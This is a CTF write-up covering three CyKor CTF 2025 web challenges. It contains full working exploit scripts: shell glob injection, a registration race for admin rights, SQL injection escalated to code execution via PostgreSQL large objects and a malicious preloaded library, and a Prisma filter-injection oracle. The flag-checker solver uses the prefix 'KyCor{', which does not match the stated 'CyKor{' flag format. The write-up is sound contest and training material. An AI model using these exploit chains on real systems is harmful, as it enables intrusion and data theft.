Turker
Published on 2025-12-07

CyKor CTF 2025 & LakeCTF Quals 25-26 Writeup

CyKor CTF 2025 Writeup

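I played HITCTF and CyKor CTF at the same time over the weekend and am completely burned out. The HITCTF writeup is on hold for now, since there are still challenges I need to reproduce.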

Web

asterisk | Solved

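  1. The input validation lets any character with an ASCII code ≤ 57 through, which includes & (38), * (42), ' (39), and # (35).
  2. Our input is concatenated straight into a shell command with no further filtering: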
const shell = `echo ${input} | node ../bin/mini-run.js --b64code '${b64code}'`;
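  1. When we send &* as the input:
    1. echo & → echo runs in the background
    2. * → expands to every file name in the ./users/ directory
    3. The first file name is executed as the command, and the remaining names are passed as its arguments
  2. So we can create the users sh and t, where the content of t's file is cat /flag. The glob then expands to sh t, and the shell runs the file t as a script.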
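
To see which shell metacharacters survive a filter like this, the check can be modeled as a plain code-point threshold. This is only a minimal sketch, assuming the validation is exactly "every character has an ASCII code ≤ 57". The names passes_filter, SHELL_META and render_command are illustrative and do not come from the challenge source, and <b64> is a placeholder value.

```python
MAX_CODE = 57  # ord('9'); the threshold described in the writeup

# A few characters with special meaning to a POSIX shell (illustrative, not exhaustive).
SHELL_META = "&*'#;|`$()<>"


def passes_filter(text: str, max_code: int = MAX_CODE) -> bool:
    """Return True if every character's code point is <= max_code (assumed check)."""
    return all(ord(ch) <= max_code for ch in text)


def render_command(user_input: str, b64code: str = "<b64>") -> str:
    """Mimic the template-string interpolation shown above; no shell is invoked."""
    return f"echo {user_input} | node ../bin/mini-run.js --b64code '{b64code}'"


if __name__ == "__main__":
    surviving = [ch for ch in SHELL_META if passes_filter(ch)]
    print("metacharacters that pass:", surviving)
    print("payload accepted:", passes_filter("&*"))
    print(render_command("&*"))
```

Under that assumption, characters such as ; and | are rejected, but & and * are enough to terminate the echo command and start a new one from a glob.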

dbchat | Solved

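  1. In the register route, the user file is saved first (save_user), but the role is inserted into the ROLE list only after a simulated slow operation (get_msg). The position in the ROLE list depends on the alphabetical order of the user file names (get_username_rank).
  2. So we register two users: slow, which takes longer and sorts first, and fast, which finishes sooner and sorts between slow and admin.
    1. When fast finishes, it computes its rank in the file list (rank 1) and inserts 'user' at index 1 of ROLE. ROLE is now ['admin', 'user'].
    2. When slow finishes, it computes its rank in the file list (rank 0) and inserts 'user' at index 0 of ROLE. ROLE is now ['user', 'admin', 'user'].
    3. ROLE[1], the entry that belongs to fast, is now 'admin', so the privilege escalation succeeds.
  3. With admin privileges, the /admin/chat endpoint is vulnerable to SQL injection. The backend concatenates user input straight into the query: SELECT ... FROM people WHERE name='{name}';
  4. Since the database is PostgreSQL, we use its Large Object feature to get an arbitrary file write.
  5. First, prepare a malicious shared library whose constructor, when the library is loaded, places the flag in the users directory as a file name.
  6. Then use lo_create, lowrite, and lo_export to write the .so file to disk.
  7. Next, overwrite postgresql.auto.conf to set session_preload_libraries = '/app/users/exploit.so'.
  8. Call pg_reload_conf() to reload the configuration, then trigger a new database connection. PostgreSQL loads our malicious library for the new session and runs the command inside it.
  9. Finally, list all user names to read the flag.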
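
The index shift behind the race in step 2 is easy to replay offline. The following is a minimal simulation, assuming ROLE starts with only the admin entry and that a user's effective role is ROLE[rank]. The helper names rank and simulate and the user names 0slow and 1fast are made up for illustration.

```python
def rank(username: str, saved_users: list) -> int:
    """Index of username among the saved user files in alphabetical order."""
    return sorted(saved_users).index(username)


def simulate():
    saved_users = ["admin"]  # user files on disk
    roles = ["admin"]        # ROLE list, assumed to hold only the admin entry at first

    # Both registrations save their user file before either role is inserted.
    saved_users += ["0slow", "1fast"]

    # The fast request finishes its delay first and inserts at its rank (1).
    roles.insert(rank("1fast", saved_users), "user")
    # The slow request finishes later and inserts at rank 0, shifting every entry right.
    roles.insert(rank("0slow", saved_users), "user")

    # Look up each user's role the same way the application is assumed to.
    effective = {name: roles[rank(name, saved_users)] for name in saved_users}
    return roles, effective


if __name__ == "__main__":
    roles, effective = simulate()
    print(roles)
    print(effective)
```

In this model the late insert at index 0 pushes 'admin' from index 0 to index 1, which is exactly the slot that fast resolves to.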

Exp:
exploit.py:

import binascii
import json
import random
import threading
import time
import urllib.error
import urllib.request

BASE_URL = "http://54.180.15.185:8081/play/1tHfAID8C7ZcFopX8v7XCWmUudOzfapF"

def make_request(endpoint, data=None, headers=None, method='GET', cookie_jar=None):
    url = f"{BASE_URL}{endpoint}"
    if headers is None:
        headers = {}
  
    if data is not None:
        json_data = json.dumps(data).encode('utf-8')
        headers['Content-Type'] = 'application/json'
    else:
        json_data = None

    if cookie_jar:
        cookies = "; ".join([f"{k}={v}" for k,v in cookie_jar.items()])
        headers['Cookie'] = cookies

    start = time.time()
    req = urllib.request.Request(url, data=json_data, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req) as res:
            response_body = res.read().decode('utf-8')
      
            if res.getheader('Set-Cookie'):
                cookie_header = res.getheader('Set-Cookie')
                parts = cookie_header.split(';')
                if cookie_jar is not None:
                    for part in parts:
                        if '=' in part:
                            k, v = part.strip().split('=', 1)
                            if k == 'session':
                                cookie_jar['session'] = v
      
            duration = time.time() - start
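            try:
                return duration, json.loads(response_body)
            except json.JSONDecodeError:
                # Not JSON: hand back the raw body
                return duration, response_body
    except urllib.error.HTTPError as e:
        duration = time.time() - start
        # Read the error body up front so it is always defined below
        body = e.read().decode('utf-8', errors='replace')
        try:
            return duration, json.loads(body)
        except json.JSONDecodeError:
            return duration, body
    except Exception as e:
        return 0, str(e)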

def register(username, password):
    duration, resp = make_request("/register", {
        "username": username,
        "password": password,
        "confirm_password": password,
        "role": "user"
    }, method='POST')

def login(username, password):
    cookie_jar = {}
    duration, resp = make_request("/login", {
        "username": username,
        "password": password
    }, method='POST', cookie_jar=cookie_jar)
  
    if isinstance(resp, dict) and resp.get('success'):
        return cookie_jar
    return None

def check_admin(cookie_jar):
    duration, resp = make_request("/admin", method='GET', cookie_jar=cookie_jar)
    if "welcome to admin page" in str(resp):
        return True
    return False

def exploit_race():
    for i in range(100):
        suffix = str(random.randint(10000, 99999))
        slow_user = "0" + suffix
        fast_user = "1" + suffix[:2]
  
        print(f"Attempting with Slow: {slow_user}, Fast: {fast_user}")
  
        t1 = threading.Thread(target=register, args=(slow_user, "pass"))
        t2 = threading.Thread(target=register, args=(fast_user, "pass"))
  
        t1.start()
        time.sleep(0.005) 
        t2.start()
  
        t1.join()
        t2.join()
  
        cookies = login(fast_user, "pass")
        if cookies:
            if check_admin(cookies):
                print(f"[+] Success! User {fast_user} is admin.")
                return cookies
    return None

def hex_encode(s):
    return binascii.hexlify(s.encode()).decode()

if __name__ == "__main__":
    cookies = exploit_race()
    if cookies:
        # 3-step Large Object upload
        # 1. Create LO with specific OID
        oid = random.randint(20000, 80000)
        print(f"Using OID: {oid}")
  
        payload = f"' UNION SELECT lo_create({oid})::text --"
        question = f"what is name of {payload}"
        print("Creating LO...")
        make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
  
        # 2. Write data to LO
        try:
            with open("exploit.so", "rb") as f:
                so_content = f.read()
            so_hex = so_content.hex()
        except Exception as e:
            print(f"Failed to read exploit.so: {e}")
            raise SystemExit(1)
      
        # Let's try one big write first.
        payload = f"' UNION SELECT lowrite(lo_open({oid}, 131072), decode('{so_hex}', 'hex'))::text --"
        question = f"what is name of {payload}"
        print("Writing data to LO...")
        _, resp = make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
        print(resp)
  
        # 3. Export to file
        payload = f"' UNION SELECT lo_export({oid}, '/app/users/exploit.so')::text --"
        question = f"what is name of {payload}"
        print("Exporting to /app/users/exploit.so...")
        _, resp = make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
        print(resp)
  
        # Now same for postgresql.auto.conf
        oid2 = oid + 1
        print(f"Using OID2: {oid2}")
  
        payload = f"' UNION SELECT lo_create({oid2})::text --"
        question = f"what is name of {payload}"
        print("Creating LO 2...")
        make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
  
        config_content = "session_preload_libraries = '/app/users/exploit.so'\n"
        config_hex = hex_encode(config_content)
  
        payload = f"' UNION SELECT lowrite(lo_open({oid2}, 131072), decode('{config_hex}', 'hex'))::text --"
        question = f"what is name of {payload}"
        print("Writing config to LO 2...")
        make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
  
        config_path = "/var/lib/postgresql/17/main/postgresql.auto.conf"
        payload = f"' UNION SELECT lo_export({oid2}, '{config_path}')::text --"
        question = f"what is name of {payload}"
        print("Exporting config...")
        _, resp = make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
        print(resp)
  
        # Reload config
        payload = "' UNION SELECT pg_reload_conf()::text --"
        question = f"what is name of {payload}"
        print("Reloading config...")
        _, resp = make_request("/admin/chat", {"question": question}, method='POST', cookie_jar=cookies)
        print(resp)
  
        # Trigger
        print("Triggering execution...")
        make_request("/admin/chat", {"question": "trigger"}, method='POST', cookie_jar=cookies)
  
        # Check users
        time.sleep(1)
        print("Checking users...")
        _, users_list = make_request("/admin/users", method='GET', cookie_jar=cookies)
        print(f"Users: {users_list}")
  
        if "CyKor" in str(users_list):
            print("FOUND FLAG!")
            parts = str(users_list).split(", ")
            for part in parts:
                if "CyKor" in part:
                    print(f"Flag: {part}")

exploit.c:

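#include <stdlib.h>

/* Runs automatically when the shared object is loaded. */
void __attribute__((constructor)) my_init(void) {
    /* Copy admin.json to a file named after the output of /app/flag,
       so the flag shows up in the user list. */
    system("cp /app/users/admin.json /app/users/$(/app/flag).json");
}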
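
exploit.py expects a prebuilt exploit.so next to it. One way to build it is sketched below, assuming gcc is available on a Linux host whose architecture and libc match the target. The helper names build_command and compile_exploit are hypothetical; -shared and -fPIC are the standard gcc options for producing a position-independent shared object.

```python
import subprocess


def build_command(source: str = "exploit.c", output: str = "exploit.so") -> list:
    """Return a gcc invocation that builds a position-independent shared object."""
    return ["gcc", "-shared", "-fPIC", "-o", output, source]


def compile_exploit() -> None:
    """Run the compiler; raises CalledProcessError if gcc reports an error."""
    subprocess.run(build_command(), check=True)
```

Calling compile_exploit() in the directory that contains exploit.c should leave exploit.so there for exploit.py to read.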

flag checker | Solved

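  1. The User model has the fields username (public and attacker-controlled), answer (secret, the target), and stage.
  2. The /leaderboard endpoint accepts a usernames array and runs the following Prisma query: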
// src/index.ts
const where = !usernames || usernames.length === 0
  ? { stage: whereStage }
  : {
      AND: [
        {
          OR: usernames.map((username: string) => ({ username })), // injection point
        },
        { stage: whereStage },
      ],
    };
const result = await prisma.user.findMany({ where, select: { id: true } });
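  1. Because each element of usernames is placed into the filter without validation, we can inject Prisma filter objects. Sending usernames: [{ "gt": { "_ref": "answer", "_container": "User" } }] makes Prisma translate the filter into the SQL condition WHERE "username" > "answer", so the endpoint returns the IDs of all users whose username is greater than their answer.
  2. This gives us a boolean side channel (an oracle), which is enough to brute-force answer.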
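
The character-by-character recovery can be tried offline against a local stand-in for the oracle. This is a minimal sketch, assuming the answer is a known prefix followed by lowercase hex characters and a closing brace, and assuming the database compares strings the same way Python does (by code point); a different collation could order punctuation differently. The names recover, HEX, SENTINEL and PAD, and the demo secret, are made up for illustration.

```python
HEX = "0123456789abcdef"
SENTINEL = "g"  # sorts after every hex digit, so an upper bound always exists
PAD = "!"       # sorts before every hex digit and before "}"


def recover(oracle, prefix: str, length: int) -> str:
    """Recover `length` hex characters after `prefix` using only `probe > secret` answers."""
    charset = HEX + SENTINEL
    known = prefix
    for _ in range(length):
        lo, hi = 0, len(charset) - 1
        # Find the smallest index whose character makes the probe compare greater.
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(known + charset[mid] + PAD):
                hi = mid
            else:
                lo = mid + 1
        # The true character is the one just below that bound.
        known += charset[lo - 1]
    return known + "}"


if __name__ == "__main__":
    secret = "demo{3fa90c17be5d2a48}"  # made-up value standing in for the answer column
    print(recover(lambda probe: probe > secret, "demo{", 16))
```

The padding character keeps a probe that ends in the correct character strictly below the secret, so the predicate flips exactly one position above the true character. With 17 candidates per position, the search needs at most five oracle queries per character.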

Exp:

import random
import time

import requests

BASE_URL = "http://3.37.112.26:3000"
USERNAME = "12312redsaf123"
PASSWORD = "password123"
CURRENT_PASSWORD = PASSWORD

ANSWER_REF = {"_ref":"answer","_container":"User"}

def register(username, password):
    res = requests.post(f"{BASE_URL}/register", json={"username": username, "password": password})
    return res.status_code == 200 or "Signup failed" in res.text

def login(username, password):
    session = requests.Session()
    res = session.post(f"{BASE_URL}/login", json={"username": username, "password": password})
    if res.status_code != 200 or "failed" in res.text:
        raise Exception("Login failed")
    return session

def update_username(session, new_username, password):
    payload = {
        "username": new_username,
        "password": password,
        "oldPassword": password
    }
    time.sleep(0.1)
    res = session.post(f"{BASE_URL}/update", json=payload)
  
    if "successful" not in res.text:
        return False
  
    time.sleep(0.2)
    return True

def get_my_id(session, username):
    payload = {
        "usernames": [{"equals": username}],
        "stage": {"gte": 0}
    }
    res = session.post(f"{BASE_URL}/leaderboard", json=payload).json()
    if "ids" in res and res["ids"]:
        return res["ids"][0]
    return None

def check_condition(session, stage, probe_username, my_id):
    payload = {
        "usernames": [{"gt": ANSWER_REF}],
        "stage": {"equals": stage} 
    }
  
    res = session.post(f"{BASE_URL}/leaderboard", json=payload)
    try:
        data = res.json()
        if "ids" in data:
            return my_id in data["ids"]
    except (ValueError, TypeError):
        # Non-JSON or unexpected response shape: treat as "condition false"
        pass
    return False

def solve_stage(session, stage_num, my_id):
    print(f"Solving Stage {stage_num}...")
  
    known = "KyCor{"
    charset = "0123456789abcdefg"
  
    # Characters smaller than '0' (ASCII 48)
    # '!' (33) to '/' (47)
    safe_low_chars = "!#$%&'()*+,-./"
  
    for i in range(16):
        low = 0
        high = 16
        ans_idx = 16
  
        while low <= high:
            mid = (low + high) // 2
            char_to_test = charset[mid]
    
            # Construct probe with random suffix to avoid collision
            suffix = "".join(random.choice(safe_low_chars) for _ in range(random.randint(1, 5)))
            probe = known + char_to_test + suffix
    
            if not update_username(session, probe, CURRENT_PASSWORD):
                print(f"  [!] Collision for {probe}. Retrying with new suffix...")
                suffix = "".join(random.choice(safe_low_chars) for _ in range(random.randint(6, 10)))
                probe = known + char_to_test + suffix
                if not update_username(session, probe, CURRENT_PASSWORD):
                    raise Exception(f"Persistent collision for {probe}")
    
            is_greater = check_condition(session, stage_num, probe, my_id)
    
            if is_greater:
                ans_idx = mid
                high = mid - 1
            else:
                low = mid + 1
  
        found_char = charset[ans_idx - 1]
        known += found_char
        print(f"  Found char {i+1}/16: {found_char} -> {known}")
  
    final_answer = known + "}"
    print(f"Stage {stage_num} Answer: {final_answer}")
  
    res = session.post(f"{BASE_URL}/answer", json={"answer": final_answer})
    print(f"Submit: {res.text}")
    time.sleep(0.5)
  
    if "Answer correct" in res.text:
        return True
    elif "CyKor{" in res.text:
        print(f"FLAG FOUND: {res.json()['message']}")
        return True
    else:
        print("Something went wrong.")
        return False

def main():
    register(USERNAME, PASSWORD)
    session = login(USERNAME, PASSWORD)
  
    my_id = get_my_id(session, USERNAME)
    print(f"My ID: {my_id}")
  
    if my_id is None:
        print("Could not find my ID.")
        return

    current_stage = 0
    while current_stage <= 9:
        success = solve_stage(session, current_stage, my_id)
        if not success:
            break
        if current_stage == 9:
            break
        current_stage += 1

if __name__ == "__main__":
    main()